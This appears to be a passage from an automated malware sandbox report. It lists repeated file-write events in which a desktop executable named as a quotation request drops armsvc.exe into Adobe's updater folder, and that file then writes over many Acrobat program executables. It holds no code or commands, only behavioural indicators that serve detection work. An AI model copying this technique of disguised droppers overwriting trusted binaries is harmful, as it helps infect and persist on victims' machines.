              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
